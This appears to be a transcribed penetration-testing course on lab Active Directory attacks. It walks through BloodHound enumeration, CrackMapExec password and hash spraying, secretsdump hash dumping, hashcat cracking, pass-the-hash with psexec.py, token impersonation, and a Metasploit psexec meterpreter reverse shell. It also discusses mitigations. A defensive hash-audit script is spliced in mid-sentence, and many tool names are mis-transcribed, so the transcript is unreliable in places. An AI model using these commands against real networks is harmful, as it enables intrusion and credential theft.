That took forever for
some reason, I don't know what's going on with my internet today, I guess it's slow. Hopefully yours is a lot faster. So BloodHound runs on a tool called neo4j; actually you can see it setting up here, neo4j. We're going to have to set that up really quick, so let's go ahead and say neo4j console, and what we're going to do is change our default password here, just so we're not using default credentials and we're going to be a little bit better on security. So you can see it boots up at this localhost. Let's go ahead and just open this up if we can, and we should gain access to this site. So, okay, your username and password are going to be neo4j, that's going to allow us to connect. So neo4j, just like the username, go ahead and say connect, and now it's going to ask you for a new password. So go ahead and put whatever password you want in there; I'm going to use the very weak password of password. Okay, so you are all set up, you're connected, you are good to go. So now go ahead and close your browser window, and now we can open up a new tab and we'll say bloodhound, should just start typing it, auto tab. I'll make this bigger so you can see it, and you can see the green check mark here means we are connected to the database. So go ahead and just put in neo4j, put in your password, I'm going to go ahead and save my password, log in, success, and now you should be brought to this that says no data returned from the query, because we haven't provided it any data yet. So we've got BloodHound set up. Now we're going to go use what's called an ingestor, get some data back from our Active Directory, and then we'll see what we can do with that data. So let's go ahead and pull data with an ingestor.

So now we need to download and set up an ingestor. There's a few ways that we can do this: there is Invoke-BloodHound from PowerShell, there is a tool called SharpHound which is written in C#, and there's actually even a Python one as well. We're just going to use the Invoke-BloodHound PowerShell method and grab some data back from the domain, and then we're going to go ahead and analyze it in the next video. So what I want you to do is go ahead and search for Invoke-BloodHound, and it should pull up a GitHub here. You see DataCollector, we can do SharpHound.ps1, or we can do, let's open both of these and take a look. So DataCollector will bring you to this; it's just going to give you some information about how you can use Invoke-BloodHound and what the different collection methods are. We'll cover what we're going to do with this here once we actually pull the data, and we're going to go ahead and just open up this SharpHound.ps1 and call the Invoke-BloodHound function when we actually run this. So go ahead and grab this file, take this file and put this onto your Windows 10 machine. Okay, so you should have both Windows 10 machines running and your Windows Server 2016 running, because we're going to start pulling data as well. So go ahead and log in, and then, if I could type my password, go ahead and log in, and then what we're going to do is I'm just going to copy this file over real quick. So go ahead and pause your video and meet me over once you've got your file moved over. Okay, so now I've got my file moved over, we're going to go ahead and run this. So I'm going to run powershell -ep bypass, just like this, and we're going to bring in SharpHound. All right, so now we're going to run this ingestor, and it's going to look just like this; you can start actually auto completing a lot of these. So we're going to Invoke-BloodHound and we're going to use a -CollectionMethod of All, like this, we're going to specify the -Domain, which is marvel.local, and we're going to put a zip file here, we're going to take a -ZipFileName and we're just going to call it file.zip, and this should be it. I'll give you a second to catch up, and then I'm going to go ahead and hit enter on this, and now it's collecting all the data. We've got all the data, now what we need to do is go copy this data. So go to your downloads folder, you should be able to copy this data, you might have to move it from one desktop to another and then onto the next. So I'm going to copy this and take this over to my Windows machine, paste it there, and then I'm going to take that and paste it onto my machine in Kali. So go ahead and get this file moved over to your machine, and then I'll meet you over in the next video when we learn how to actually import this file and review the details.

Okay, so now we have our BloodHound opened, it's a blank screen, we've got our file transferred over, and we're ready to do some BloodHound reviewing. So let's go ahead and do upload data over here on the right, it's a little up arrow, and then I have my file.zip in my home folder. So I'm going to go here and I'm going to go file.zip, we're just going to upload this, you can see it's processing all of the JSON files that are coming through, and in just a second it will have some nodes available for us. So now let's go ahead and click over here on the little hamburger, and you can see that we've got nine users, three computers, 52 groups, three sessions, 512 access control lists and 592 relationships. That's a lot of numbers. So what we're looking at, and yours might be a little different because it's looking at sessions, so based on who you had logged in at the time, and I've been just logging in kind of willy-nilly on either Frank Castle or administrator or wherever, so the different sessions could be different versus how you've been logging in, but the groups should be relatively the same, computers should be the same, users should be pretty much the same. So we can go over to queries, and they have some pre-built queries for us. So let's find all domain admins, and we can look here and it says, hey, Administrator is a domain admin, tstark is a domain admin, and if we drag this over just a bit, SQLService is a domain admin. So right away we know all the domain admins. Let's find the shortest path to the
domain admin, and it says domain admins at marvel.local, go ahead and select that, and it says, okay, well, if we look at THEPUNISHER.marvel.local, well, administrator at marvel.local has a session here. Well, I was logged in as administrator, so the session's here. What does that make you think of? Well, okay, token impersonation, which we haven't covered yet, but token impersonation is going to be a big one. We can leverage attacks against this to try to compromise the administrator accounts with Mimikatz, which you're going to see as well. So you want to target boxes where there is a domain admin logged in, and we can leverage this here. We could say, okay, well, I don't want to target Spider-Man, it's got nothing going on, but The Punisher, now if I can get onto that machine, I can get that administrator account, and then I'm a domain admin. That's the shortest path for me, right? So we can look through here. Now domain trust, there's nothing for us here, there's no domain trust for us to do. We could look through unconstrained delegation and try to find information on that, and there's just a bunch of pre-built queries here. So we haven't talked about Kerberoasting yet, but we will: shortest path to Kerberoasting users, or Kerberoastable users. So there's the krbtgt account, which is a ticket granting ticket account, and SQLService that we set up. Let's just look at SQLService. So we can look through that and it's telling us, hey, you know, the SQLService is part of domain admins, that's not good, right? And The Punisher has access, Spider-Man has access, and we'll talk about what Kerberoasting is here in just a few videos. So high value targets, we can look at that as well, and this is insane, right? But obviously the administrator is a high level target, so if we can capture the administrators here, or the actual administrator, that lights up all the different paths here where it's red, and you can see Frank Castle is an admin too. The Punisher, which has a session with administrator, who is part of the administrators group, who's part of the domain admins group, who's part of the enterprise admins group, and you can kind of just look through here and see all the different memberships and all these unique graphs. Look at this, look at the complexity that's going on here, right? And this is just nine users, three computers. Imagine a network and how complex this is, and imagine having to try to figure this out for yourself, where we can just click a button and we know all the domain admins, or we can just click a button and see where the domain admin has a session. This is amazing stuff here. So when you're doing an assessment and you've got compromise and you're on a machine, you might as well run BloodHound and gather as much data that you can out of that machine, out of that network, and see where your next movement is and really start to target your paths, especially if you're in a timed assessment or you don't know your next step or your next move. This is a great tool, really great tool to use, and again, just like PowerView, this just scratches the surface. There are pre-built queries and custom queries that you can write and define here and kind of make your own. I'm going to leave that up to you as well to do research on those. Honestly, me, I use pretty much what's in here as the pre-built and that's enough for me, but if you want to go more deep here and go into custom queries, you're welcome to do that as well. But this is a nice overview of what BloodHound is capable of and how you can enumerate with it. So that's it, hopefully this was informative for you. I just wanted to provide a quick overview of a couple tools that we can use. The enumeration process never changes, right? Once we have an account on a network we're going to enumerate. We're going to enumerate before we get an account, we're going to try to find access, once we get access we're going to re-enumerate, we're going to see what information we can learn once we've gathered that account, and then again, every time we have access to a new machine, we don't know what stones that's going to uncover. As you're going to see in the next section, one machine to the next can be a huge difference based on who's logged in and what information it has on it. You don't know if that information on there has maybe a text file with documents or passwords in it, you don't know if there's an administrator logged into that computer and then we can impersonate that administrator. There's so many different things that change from machine to machine. Enumeration is important, and the tools and techniques all the way through this course that you've learned already, you know, nmap, digging around, just looking around for information, is important, and then just adding these two tools here to your arsenal is going to make you significantly better as a pen tester, and it'll give you something to talk about in an interview as well. You can say, look, I use PowerView and I use that to look through for, you know, users, groups, I look through policies, group policies, computer policies, and you'll be able to talk to those. And you can say, look, I use BloodHound, and I look at that to look at the administrators in the network, what administrators are on what machine, what's my shortest path to the domain admin, what are my high value targets, and you could talk through that as well in an interview, and you're going to sound like you know what you're talking about, and it's going to set you apart from other people. Honestly, it's going to set you apart. So take these two tools that I'm showing you and play around with them, get better, and you're going to see a big difference. So from here we're going to talk about post exploitation attacks. So once we've compromised one account, what can we do with that account, and how can we leverage that into other compromises and eventually own this whole network here? So I'm excited to move forward and cover these next sections, so I'll see you over in the next section when we start talking about these attacks.

Welcome to this section on attacking Active Directory: post-compromise attacks. So all the attacks that I'm about to introduce you to in this section involve having some sort of credential first. So we have to have a username, password, or a shell on a machine, or something along those lines, in order for these attacks to be effective. So we're going to be covering attacks like pass the hash, pass the password, we'll talk about token impersonation and Kerberoasting, GPP / cPassword attacks, and golden ticket attacks, and you don't have to have any idea what I'm talking about right now, I'm just kind of giving you a quick overview. So just keep in mind that these attacks require compromise already, and they're some of the best attacks that we can leverage in a network once we do have compromise. So I'm really excited to go over this and really excited to take you down this learning path of these attacks. So let's go ahead and jump into the first one, where we start covering pass the hash and pass the password.

So the first thing that I like to do when I compromise a user account or a machine is I like to do what is called pass the password, or possibly pass the hash. So when we talk about what this is, this is just passing this around the network. So remember we captured the password of Password1, and we cracked it when we captured it with Responder. Now we have a username and a credential, and we logged into a machine, we dumped some hashes, and we have credentials there as well, right? So utilizing those, we can either take those credentials offline that we dumped, or we can take those hashes and try to pass them around, or pass the password around. So taking a look at what this means on a technical level, there is a tool that we're going to use called CrackMapExec. Now CrackMapExec just takes the username, domain and password, as you see here, and what it does is it throws that password all around the subnet here. So we'll take it
against the subnet throw it around and we'll see where it sticks now if you recall we have our user Frank Castle who's not only an admin on The Punisher machine but also an admin on Spider-Man machine as well so playing off the different example of past the hash let's say that we have a PS exec here which is what I've set up we have PS exec with interpreter we get on to this machine and we run a hash dump well we can take the hash dump of that local user here and you can see we just captured the last bit of this hash and we'll just try to pass that around so what that looks like is something like this where you do the same thing against the network here with the user F Castle which is a local user and then the capital H for a hash and then dash dash local signifying that we're going to go ahead and pass this around locally and you can see that we didn't have any luck on this one and that's okay but that's still what we're after is we're after trying to pass this local hash around to see if we can get on any machines this one is a big one these two are big ones now you do not have to crack this password to be able to pass this hash around that's huge the other thing is if you do have a password you could pass that around and see where you can get on any machine as well these local accounts are very dangerous the issue is a lot of Administrators will reuse the same account and password to set up machines so if you're able to dump an administrator password or a hash then guess what you can pass that hash along the network and I have seen it where the entire network uses the same local administrator password or hash and you own the whole network without really having to compromise anything so looking into these local hashes these local accounts are super important as well so from here we're going to install our tool we're going to take a look at a couple different features and what we can do here and then we're going to play around crack map exec and see what it's 
capable of as well so let's go ahead and just dive into the next video and we're going to go ahead and install crack exec all right installing crack map exec is super super easy so from a terminal all we have to do is say aft install crack map exec just like this and it should load up for us might take a second to download the files and tonight it's running a little slow on the internet for me so give this just a second here and it will install and then we should be ready to go so go ahead and get this installed this is all you need to do for now very short video possibly the shortest one in the class and then check it real quick crack map exec it's there it works we're good to go so I'll catch you over now in the next video all right now let's set up the situation here we've got our Windows Server running and we've got every machine running so I've got my two Windows 10 machine my Windows Server running and we're going to use this tool that we just installed crack map exec and it's going to look something like this you can say crack map exec we could do dash dash help and take a look at what it's got to offer us and I can make this a little bit bigger we can scroll up to the top and really what it does is we need to provide it with a Target typically we either provide Target IP addresses a range or cider notation we can do a bunch of different things my favorite is just give it a cider notation and you're going to see what that looks like then we're going to have to provide a username a domain and a password or we can provide a username and password and do a dash dash local if it's a local account but from here we're going to provide a username domain password because as of right now we have just captured the user account of fcastle password one and there's so many different things that we can do here there's actually a lot of modules that we can run now the modules are kind of finicky but I'm going to show you some cool little tricks that we can attempt to do 
here so first of all let's just check our status how about we do that so we're going to just do something like this we're going to say crack map exec okay in in a small pause and course update crack map exec actually changed the way the syntax is run so we need to make a minor change what I'm about to show you is how to do this and I just want you to follow along with this change so what you're going to do instead of writing the IP address as shown in the next part of this video all you need to do is put SMB in front of it so whatever your IP address is like 192 168 0.0 24 whatever that might be right here ensure that you have SMB in front of it and then go ahead and follow along with SMB in front with the rest of the command line and you should be good to go the rest of the time and we're going to say a user actually let's go ahead and specify the domain or where we're going to be attacking so 192 168 57.0 24 for me so it's going to sweep the entire network with this we're going to say user of f Castle domain of Marvel dot local and password of password one so go ahead and fire that off and there we go so it has gone ahead and it attempted to attack my DOT one machine which is my local machine here but it also attacked the network that we have right so we've got the hydro DC we've got Spider-Man and then the Punisher here and you could see that it came through it tried this username and password on hydro DC it did not work what does that tell us that means that this user does not have SMB access because this is trying to access SMB here it doesn't have SMB access to the domain controller unfortunately we don't win that easy all the time uh We've also tried Spider-Man right we knew about the Punisher but we didn't know about Spider-Man so that's nice um so we've got Spider-Man now and The Punisher so we've owned a second machine when it says pone here that means we now have access to a second machine so what can we do we could go PS exec dot pi and we can use these 
credentials and do it to dot 142 as we did with DOT 141 we can also do something which this is kind of cool we could do something like Dash ass Sam and if we get Ownage sometimes this will work for us it's going to try to dump the Sam file and here it didn't work that's okay so it tries to go in and this is successful a lot of the time where it goes in and it'll try to dump the the Sam file out of these machines and if we look up here there's a few different things that we can do with it we could try to dump the Sam or LSA ntds which we talked about way in the beginning and we're going to talk about it again here in a little bit uh we could enumerate shares there's all kinds of things that we can add on again there's all these modules which we're not going to even cover I do recommend reading the documentation on this because it can go really deep and it's surprising how deep this can actually go but from here let's just talk about what we can do so we weren't able to dump the Sam here but we can utilize a tool called secret stump which we're going to cover in the next video on how to get the Sam file and we can just do that PS exec right so we had PS exec.com Ai and we could say Marvel and we could say F Castle Ward one and we could put that at 192.168.57.142 and try to get a shell there and wouldn't you know it who am I hostname where Authority system on Spider-Man so this is a quick win here we can take advantage of this as we're going to see in the next video dumping some hashes out getting some more information extracting this we could also go try to get a shell on this machine uh via the meterpreter PS exec as well and utilize those so that's just a quick overview of how useful passing the password is this is if I get a credential the very first thing I'm doing is I'm passing it around the network because I know it's valid you can also utilize this the password spray but I would recommend against doing that on domain accounts because what happens is say we 
have 50 machines here you take this username you could put any password you want here and try to spray it across the network and what's going to happen is you're going to get failed login attempts and if you get so many in a row you might lock out your user account however if you have a local account which you're going to see here in a couple videos you can actually try password spraying against it and you could just throw anything you want at it to see if it sticks and you might get lucky and the local accounts will have that same lockout policy like domain accounts do so I always like to do some password spraying on local accounts as another strategy if you're kind of stuck in not getting anywhere or if you've come across some different passwords or different password phrases or patterns that you might have noticed in the network it's another good thought to have to just try it against some different accounts or even just admin or administrator so that's it for this lesson we're going to go ahead and move on to the next lesson which is how to dump hashes now that we have this here so we've got a user account let's dump hashes with this user account especially on the two machines that we found and we'll store those hashes we'll even try to crack those hashes and we'll move on to passing the hash as well just as an example so I will catch you over in the next video so now we've used a password to pass around the network we discovered that 142 and 141 have the same local admin of Frank Castle so we are able to get a shell on both machines now we could try PS exec with metasploite go in there run hash dump see if we can get lucky but again that's a little bit on the noisy side that does you saw it get picked up by uh anti-virus by Windows Defender but you're seeing that PS exec still isn't I still haven't turned off my antivirus quite yet so you can see that PS exec on PS exec.pi is not getting picked up so that's nice what we can do to dump hashes in this situation 
is we can run a tool called secret stump and guess what secretzump.pi also part of the impact it toolkit so we can do something along these lines we can say Marvel F Castle and then password one this should look very familiar it's the same syntax as before and then just 192 168 57 and we'll start with Frank Castle's machine at 141. try that see what happens oh look at that that's beautiful okay we know we have access to 142 as well so let's go ahead and just do that and it's going to come in here and it's going to dump all this information for us so this is wonderful information okay it's coming in here and it's dumping not only the Sam hatches but it's dumping what are known as LSA secrets in this DP API key um you don't have to worry too much about these right here more so we're going to focus on the hashes that we get back if we get any local hashes we'll talk more about what the LSA secrets are and the rest of this is when we get into mimikats here in just a few videos so I'll save that for this or I'll save that for later but just know that you can dump these hashes and look we can grab these we can also just kind of examine and see like I can copy this and we can just go into a new tab and just say G edit I'll just call this test and we'll just paste this into here and then I'll grab these other ones and I'll paste them and you could do a quick the quick eye test and see here if I can copy if the same hash shows up more than once so look here and just see and we can separate these out just to make it a little easier if there's password reuse the last hash here will be the same so you can see here that the administrator account is utilizing the same password so if we're going to try to pass this hash around guess what we are we can try to pass this around and see if it'll get us around the network and we'll see what this does and then we'll try to crack some of these hashes and see if these hashes crack what it's going to look like and go from there so in the 
next video we're going to focus on trying to crack these hashes and then I'll show you the passing the hash method which is incredibly useful and why we don't even have to attempt to crack these if we don't want to so let's go ahead and jump over the next video or we just quickly try to crack these passwords and then we'll move on into passing the hash picking up right where we left off so I'm going to clean this up just a little bit we know the administrator here they're the same hash we can identify that here so I'm going to actually just delete all of these accounts and we're not going to worry about this w d a utility here wdag we're not going to worry about default account or guest account I'm gonna go ahead and delete all those I'm just interested in the user accounts and the administrator accounts so let's copy this and I'm going to move this to my hashcap folder and I'm going to just put it in a new text document I'm actually going to reuse the one that we used before which was that that hashes4.text so we'll use that and then we're going to go ahead and try to crack it so bringing this over you can see that these hashes here these hashes are what are called ntlm previously we've cracked ntlm V2 hashes now ntlm are the local hashes when you dump a Sam that's what type of hash it is now these are stored under module 1000 again you could do hashcat dash dash help and then grep ntlm and find that but we're going to try to crack these if we can't crack these then we'll try to pass them around special note one thing to remember you can pass around ntlm hashes you cannot pass around ntlmv2 hashes big difference ntlm hashes can be passed and tail and B2 cannot so remember that from the next video but from here what I'm going to do is I'm just going to do same thing as before hashcat64.exe and I'm going to give this a module of a thousand because that's ntlm and then I'm going to just provide this hashes if I could spell it hashes4.text and then rock you dot text 
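The eye test in gedit and the hashcat run are the manual version of what a password audit does after a SAM dump. The Python below is an added example, not code from the course, Impacket or hashcat: it parses secretsdump-style SAM lines, reports NT hashes shared across hosts (the reuse the eye test looks for), flags the blank NT hash that marks an account with no password set, and checks the hashes against a short candidate list the way mode 1000 does. It reimplements MD4 because hashlib's md4 is often unavailable under OpenSSL 3, which also makes the point that an NT hash is unsalted MD4 of the UTF-16LE password, so equal passwords always give equal hashes. The hostnames, usernames, candidate passwords and dump lines are all constructed, and the hashes in the sample are generated from those constructed passwords, not captured from a machine.

```python
"""Audit a SAM hash dump for reuse, blank and weak passwords.
Added example, not course, Impacket or hashcat code. Assumes secretsdump.py's
SAM line format 'user:rid:lmhash:nthash:::'. Every dump line here is constructed."""
import struct
from collections import defaultdict

_M = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _M


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often missing under OpenSSL 3."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", bytes(msg[off:off + 64]))
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1: F, words in order, shifts 3/7/11/19
            a = _rotl((a + ((b & c) | (~b & d)) + X[i]) & _M, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2: G, words 0,4,8,12,1,5,..., shifts 3/5/9/13
            k = (i % 4) * 4 + i // 4
            a = _rotl((a + ((b & c) | (b & d) | (c & d)) + X[k] + 0x5A827999) & _M,
                      (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3: H, words 0,8,4,12,2,10,..., shifts 3/9/11/15
            k = (0, 8, 4, 12)[i % 4] + (0, 2, 1, 3)[i // 4]
            a = _rotl((a + (b ^ c ^ d) + X[k] + 0x6ED9EBA1) & _M, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & _M, (b + bb) & _M, (c + cc) & _M, (d + dd) & _M
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), no salt: equal passwords give equal hashes."""
    return md4(password.encode("utf-16-le")).hex()


EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of "": blank/unset password
LM_EMPTY = "aad3b435b51404eeaad3b435b51404ee"       # LM field when LM storage is disabled
BUILTIN_SKIP = {"Guest", "DefaultAccount", "WDAGUtilityAccount"}  # ignored, as in the video


def parse_dump(text: str):
    """Parse secretsdump-style 'user:rid:lm:nt:::' lines; skip banners and junk."""
    entries = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        entries.append((parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()))
    return entries


def audit(dumps: dict, candidate_passwords) -> dict:
    """dumps maps host -> dump text. Returns reused, blank and weak-password findings."""
    by_hash = defaultdict(list)
    blank = []
    for host, text in dumps.items():
        for user, _rid, _lm, nt in parse_dump(text):
            if user in BUILTIN_SKIP:
                continue
            by_hash[nt].append((host, user))
            if nt == EMPTY_NT_HASH:
                blank.append((host, user))
    # One MD4 per candidate, then a dictionary lookup per account: the reason unsalted
    # NT hashes fall to a wordlist so fast (hashcat -m 1000 does this at scale).
    lookup = {nt_hash(p): p for p in candidate_passwords}
    weak = {acct: lookup[nt] for nt, accts in by_hash.items() if nt in lookup
            for acct in accts}
    reused = {nt: accts for nt, accts in by_hash.items()
              if len(accts) > 1 and nt != EMPTY_NT_HASH}
    return {"reused": reused, "blank": blank, "weak": weak}


def sample_dumps() -> dict:
    """Constructed dumps for two hosts; hashes are generated here, not captured anywhere."""
    def line(user, rid, pw):
        return f"{user}:{rid}:{LM_EMPTY}:{nt_hash(pw)}:::"
    punisher = "\n".join([
        "[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)",
        line("Administrator", 500, "Password2"),  # same local admin password on both hosts
        line("Guest", 501, ""),
        line("fcastle", 1001, "Password1"),
    ])
    spiderman = "\n".join([
        line("Administrator", 500, "Password2"),
        line("Guest", 501, ""),
        line("peterparker", 1001, ""),  # blank NT hash: no password set / disabled account
    ])
    return {"192.168.57.141": punisher, "192.168.57.142": spiderman}


if __name__ == "__main__":
    findings = audit(sample_dumps(), ["Password1", "Password2", "Summer2023"])
    for nt, accts in findings["reused"].items():
        print(f"REUSE {nt} shared by {accts}")
    for acct in findings["blank"]:
        print(f"BLANK {acct}")
    for acct, pw in findings["weak"].items():
        print(f"WEAK  {acct} -> {pw!r}")
```

The blank-hash check only works for the NT half: the LM field is the constant aad3b435b51404eeaad3b435b51404ee whenever LM storage is off, which is why the video tells you to copy the second half of each line. Because the audit keys on the raw NT hash, the reuse finding fires even for hashes no candidate list cracks, which is exactly the case that makes pass-the-hash work without cracking.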
we'll just use a simple word list Dash capital O for optimization here and it's going to try to crack these passwords it should go through it pretty quick and I think at least one of them will fall oh we made the we made the admin password password too I actually had forgotten and then the Peter Parker or one of them three one oh three One D came back as as a admin that is blank so it's possible that our admin actually is disabled when we see a blank account like this that means that the password is likely disabled so we might not be able to actually pass this around because that account has been disabled we could try to pass around password 1 and password two but we've now cracked both of these two and these are weak accounts so now we also have a good idea of what kind of passwords they're using in their environment and we could just take note of this and this is something that we can write in a report as a finding and just build off of this it's always about passwords right it really comes down to passwords and weak passwords are going to get your network taken down so quick because there's so many different ways that we can capture hashes in a network that it's just a matter of time before we do and then start trying to crack them or pass them around so let's go ahead and meet up in the next video when we try to pass around a hash and then we'll talk mitigations after that so we've got these three hashes here and all we need to copy is this second half right here so we're just going to copy the second half and we can copy this and we're going to use crack map exec to try to break it so or at least try to pass it so what we can do is we could say something like crack map exec same situation here make sure that crack Mecca zek has SMB after it before you run the command as shown in the video this is just a small update to the command line and a change that crack map as deck hasn't made give the range that we're going to test again so 57024 and then we're going to 
say username and this one is Frank Castle like this so because we have the space in there I'm going to go ahead and just put that in quotations and then we're going to do a capital H for hash paste that in there and the last thing we want to note is that this is local so dash dash local is important to put in here okay one more small change that has come from crack map exec here this is what your syntax should look like right this second with your hash being here instead of the place of this hash dash dash local dash auth is the new syntax in the video I show you dash local make sure you add the dash auth just to make sure this runs smoothly so again one small change from crack SEC make sure you have local author make sure you have SMB in the front the rest should stay the same in this situation go ahead and hit enter and see it's going to try to pass this around the network and gain access now it doesn't say that it's pwned here which is interesting but we do have the user light up green which is an indicator that this might have actually worked in the attack so if we see pound or we've seen a green one here like a green plus sign that's a good indicator that this has worked pone is a guarantee the Green Arrow or the green plus sign here is a good chance but this has resulted in false positives in the past we do know that it worked and it attempted to pass it along the rest of the way here it was unsuccessful as expected which is okay but again passing this hash around the network you never know what you're gonna find you never know this could light up green for all of these with pwned all the way down the list and then guess what we have every single machine and I've had this happen in countless assessments and if you want a story time quick story time there was a assessment that I was up against that was using something called privilege access management which we're going to talk about really quick in the next video but that's a great mitigation to these sorts 
of attacks because what happens is a user goes in and they have to check out their domain account so there are tools called like cyber Arc or psychotic that can be used where you go in you type a password you check out your domain account and your domain account password is really long it's some crazy complex 15 to 30 character password you utilize that for eight hours or so and then guess what when you check it back in that password rotates to a new password so you only know this crazy complex password for eight hours it's impossible to capture LMR or any kind of hash that's ntlmv2 and try to crack it but guess what I was able to use SMB relay on an assessment dump out the Sam hashes just like this I saw administrator on there I just went and copied this put it into crack map exec just like I did here fluid around the network and it owned everything in cyber Arc privilege access management that's not cheap we're talking million dollar software that they had focused on security and their domain controller went down in seconds because they weren't thinking about their local admin accounts local admin accounts are so important especially if you're reusing these passwords it's gonna hurt you so bad so keep this in mind as another form of attack utilizing these local hashes and another thing to do as well is you can put this into PS exec and get a shell out of it if you want you can use PS exec.pi to do this so for example if we go to PS exec and we just say dash dash help you'll see in here that there is a place for hashes so you can utilize the whole hash to authenticate instead of utilizing a password so we can do something along the lines of this PS exec dot pi and we'll just say something like we'll say Frank Castle like this and we won't give it a password and we'll just say at and this will be 192.168 57.141 and then we'll say hashes and then we need the whole hash for this one so we need the LM hash and the NT hash and if we look here this is the LM hash and 
the second part is the NT hash you need the entire hash for PS exec to work here so let's go ahead and paste that and we'll hit enter and we can see while this user was able to authenticate here we were able to request the share we weren't able to get any admin access via this one so even though this user has access to this machine we're still not able to get a writable share where we can upload and get a shell and to prove concept here we can try it on another computer say 42 where we know we don't have Privileges and you can see there's a login failure so there's a difference here but this is just another thing that you can do you can attempt to get a shell with this local user without ever having to use PS exec or know the password or anything so just building upon this if you pass this password around the network and this password works all over the place then your next move would be to do this setup here put your hash in and then try to fire it and get a shell this is a quick way to own a domain controller for example if the domain controller is allowing something like this or that user is valid on that domain controller so from here we're going to go ahead and talk mitigation strategies and then we'll move on to some more fun attacks in active directory let's talk mitigation for past the hash past the password now mitigating this completely is difficult but as an administrator you can make my life very difficult as an attacker so one thing to note is if you limit your account reuse for example Frank Castle being a local Advent on multiple computers when we pass the password that got us into multiple machines we only had access to one machine now we've laterally moved across the network to another machine and who knows what we're going to find because it's a whole different set of hash dump when you saw we dumped the the hash we can also start looking through files on computers looking for anything interesting you're going to see some more attacks that we're 
going to find here and there's different attacks that we can pull off as a user so there's things that one machine might not have for us but once we move laterally to another machine then guess what it's a whole new ball game and then that might open up something we didn't see before that allows us to escalate into domain admin so if we do not have local admins on machines or reusing them then guess what it's going to be really hard for us to do that again you should also limit who is that local administrator right least privilege we've talked about this time and time again here the strong passwords come into play as well not so much for the passing of the hash but passing of the password if we're never able to crack the entail mb2 hash in the first place and get a shell on these machine means then we're never going to be able to actually perform these attacks and get here in the first place so utilizing strong passwords in your network is big big lastly we talked about in the last video privilege access management you can make my life very difficult in a situation where you're using privilege access management in that story that I talked about where I took down that Network that had that million dollar privilege access management right they were using cyber Arc and they had that tool I took them down because they were using bad local admin passwords and they were reusing them had they been using good local admin passwords and they weren't reusing them I would have failed on that assessment hands down no doubt about it but because of that they had a big weakness there and it can just bypass these million dollar systems however these systems are important very very important so if you can utilize it if you have the funds to utilize privilege access management in your system in your environment please do it it's really worth it so that's it for this so now we're gonna move on to what are called token personation attacks and these are really fun you're going to see 
why in the next video our next attack type is called token impersonation so what are tokens well you could think of tokens basically as cookies for your computer there are these temporary Keys allow you access to a system or network without actually having to provide your credentials so like a cookie now there are two types there's what is called a delegate or an impersonate token so for the delegate token that is used when you log into a machine or you have a remote desktop for example or if you have an impersonate token if you're having like a network drive attached or some sort of domain logon script that's where you would see an impersonate token in this course it's much easier to just demonstrate a delegate token because all we have to do is log into a machine and then that token exists so we're going to do that so let's take a quick overview before we go into the live demonstration of why this is bad and what this really is so here we have our user and we have we've gotten a shell and we're in a shell in interpreter we've loaded a tool here called Incognito which is built into Metasploit and we're just going to list our tokens of our user here Marvel F Castle appears we're on the Frank Castle machine now we're going to go ahead and try to impersonate that user so we're going to say is impersonate token Marvel F Castle kind of like this we'll go into a shell and guess what we're Marvel Frank Castle cool so let's go ahead and try to run something do not worry about what this is right now but we're going to use invoke Mimi cats and this is a Powershell script that is trying to dump hashes okay we're trying to uh do an LSA dump here and dump all the hashes off the domain controller and what's going to happen is it's going to say hey access denied you do not have this kind of access okay but what if for some reason the user was a domain admin and that token was available now you can see the domain admin has logged into this machine the tokens now available and 
we're going to impersonate this token so we're going to say impersonate token Marvel administrator we go into a shell and you can see that Marvel administrator is now available to us we try running this command again and guess what it succeeds this time allowing us to dump all the hashes in the network including the Kerberos ticket granting ticket hash which we haven't covered yet we'll get there but this is a big win so the difference is that if you can navigate to a machine and you find a token of a domain administrator that you can impersonate you have domain admin there are a lot of things that you can do with that domain admin so you want to bounce around and look for these token impersonation attacks and really see if you can't find that domain admin on a machine so this is what I was talking about in the last video when it came down to moving laterally and there's always potential difference in a new machine so we might go from machine one where we're Frank Castle and there's nothing great we passed that password pass that hash around we get onto machine two where we're on Spider-Man's machine and there is the administrator just sitting there with a token and then we impersonate that token and then we are now a domain administrator we can act on their behalf so pretty cool feature here so let's go ahead and do a live demonstration of this so we can get Hands-On and then we'll talk about mitigation strategies now to perform this attack with token impersonation we're first going to have to use Metasploit so let's go ahead and just type in msf console we're going to load this guy up and then we're going to go ahead and search for PS exec we're going to get a shell on the Frank Castle machine or The Punisher machine so I'm just going to say use exploit Windows SMB PS exact because I have it memorized here and we're going to say options and then we're going to set our our host which should be the Punisher machine mine's at 57 141 we're going to set the SMB domain 
which is going to be marvel.local. Set SMBPass as Password1, set SMBUser as fcastle, and let's go ahead and show targets once you have that all set up. So I'll say show targets, and I'm going to do a native upload, so we'll set target of 2. I'm going to type options here, and I'll stall verbally just for a second so you can catch up if you need to, but we're just making sure that everything is checked with our boxes: we've got the right RHOSTS, we've got the right domain, password, user, native upload. Last thing, we're going to want to set the payload here, because it's going to try to attack with an x86 payload, so we're going to go ahead and just say windows/x64 and we'll say meterpreter/reverse_tcp. Options: set the LHOST here to eth0, and now if we type options one more time it should look good. We've got 192.168.57.139 as the LHOST; that is us. Okay, let's try to run this, and boom, meterpreter session right off the bat. That's what I love to see.

